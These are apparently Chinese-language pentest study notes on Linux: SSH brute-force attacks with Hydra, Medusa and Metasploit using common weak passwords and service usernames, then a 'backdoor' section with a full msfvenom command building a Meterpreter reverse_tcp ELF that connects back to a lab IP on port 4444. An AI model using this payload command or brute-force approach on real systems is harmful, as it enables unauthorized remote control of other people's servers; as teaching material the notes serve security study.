Linux是开源系统,系统本身因漏洞造成的攻击相对比较少,主要集中在SSH攻击;
SSH所采用的加密机制,可以防止数据传输过程中信息泄露;
SSH基于用户名密码的身份验证,容易遭受密码暴力破解攻击;
SSH暴力破解工具
Hydra、Medusa、msf
大部分攻击都是针对Linux服务器默认管理账号root,攻击者主要使用admin、root、123456等常见弱密码进行暴力破解
少部分攻击是针对 tomcat、postgres、 hadoop、 mysql、apache、ftpuser、vnc等Linux 服务器上常见应用程序使用的用户名
攻击者不仅使用常见通用弱密码,还会将用户名当作密码进行攻击
对称加密
加密和解密速度快,效率高
LINUX后门
侵入成功后,为了持久远程控制对方,即便是对方已经进行安全加固
1.创建后门程序(在kali第一个终端中执行)
# msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.10.224 lport=4444 -f elf -o shell //后门名称是shell,反弹到192.168.10.224的4444端口
-o 指定创建的后门程序
-lhost 反弹的主机:本机IP地址
-lport 反弹的端口:本地端口号